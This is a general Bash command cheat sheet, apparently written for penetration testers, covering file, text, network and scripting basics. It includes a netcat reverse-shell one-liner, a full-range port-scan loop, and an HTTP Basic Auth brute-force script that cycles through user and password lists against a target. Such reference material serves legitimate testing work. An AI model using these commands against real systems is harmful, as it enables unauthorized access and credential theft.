Bash

Bash (Bourne Again SHell) is a powerful command-line interface and scripting language used widely in UNIX-like operating systems. It is essential for security professionals and penetration testers to harness the full potential of Bash for tasks such as automation, information gathering, and exploitation. This cheat sheet provides quick references and examples for using Bash effectively.

Basic Commands

File and Directory Operations

• List files and directories: ls

• Change directory: cd /path/to/directory

• Create a directory: mkdir /path/to/directory

• Remove a directory: rmdir /path/to/directory

• Copy files: cp /path/to/source /path/to/destination

• Move/Rename files: mv /path/to/source /path/to/destination

• Delete files: rm /path/to/file

File Content Operations

• View file content: cat /path/to/file

• View file content page by page: less /path/to/file

• Search inside files: grep 'search_term' /path/to/file

• Count lines, words, and characters in a file: wc /path/to/file

Permissions

• Change file permissions: chmod 755 /path/to/file

• Change file ownership: chown user:group /path/to/file

Text Processing

awk

• Print the first column: awk '{print $1}' file

• Print specific columns: awk '{print $1, $3}' file

• Pattern matching and printing: awk '/pattern/ {print $1}' file

sed

• Substitute text in a file: sed 's/old/new/g' file

• Delete lines matching a pattern: sed '/pattern/d' file

grep

• Search for a pattern in files: grep 'pattern' file

• Recursive search in directories: grep -r 'pattern' /path/to/directory

cut

• Extract columns: cut -d':' -f1 /etc/passwd

sort

• Sort lines in a file: sort file

uniq

• Remove duplicate lines: uniq file

tr

• Translate or delete characters: tr 'a-z' 'A-Z' < file

Network Operations

Network Scanning

• Ping a host: ping -c 4 host

• Scan open ports with netcat: nc -zv host 1-65535

• Network enumeration with nmap: nmap -A host

File Transfers

• Download a file with wget: wget http://example.com/file

• Upload a file with curl: curl -T file ftp://example.com

Network Connections

• Establish a TCP connection: nc host port

• Open a reverse shell: nc -e /bin/bash host port

System Monitoring

Process Management

• List running processes: ps aux

• Terminate a process: kill PID

• Force terminate a process: kill -9 PID

Disk Usage

• Check disk space usage: df -h

• Check directory size: du -sh /path/to/directory

Memory Usage

• Check memory usage: free -h

Scripting Essentials

Variables

• Define a variable: VAR_NAME="value"

• Access a variable: $VAR_NAME

Conditionals

if [ condition ]; then
  # commands
elif [ condition ]; then
  # commands
else
  # commands
fi

Loops

• For loop:

for item in list; do
  # commands
done

• While loop:

while [ condition ]; do
  # commands
done

Functions

function_name() {
  # commands
}

Practical Examples

Basic Port Scan

#!/bin/bash
for port in {1..65535}; do
  timeout 1 bash -c "echo > /dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done

Directory Backup

#!/bin/bash
SOURCE="/path/to/source"
DEST="/path/to/destination/backup-$(date +%F).tar.gz"
tar -czvf $DEST $SOURCE

Log Parsing

#!/bin/bash
grep "ERROR" /var/log/syslog | awk '{print $1, $2, $5}'

Basic Authentication Brute Force

#!/bin/bash
for user in $(cat users.txt); do
  for pass in $(cat passwords.txt); do
    response=$(curl -s -o /dev/null -w "%{http_code}" -u $user:$pass http://target)
    if [ $response -eq 200 ]; then
      echo "Valid credentials: $user:$pass"
    fi
  done
done

Security Tips

• Use absolute paths in scripts to avoid unexpected behaviors.

• Validate inputs to prevent injection attacks.

• Limit permissions and use sudo sparingly.

• Log and monitor script activities.

• Encrypt sensitive data in scripts.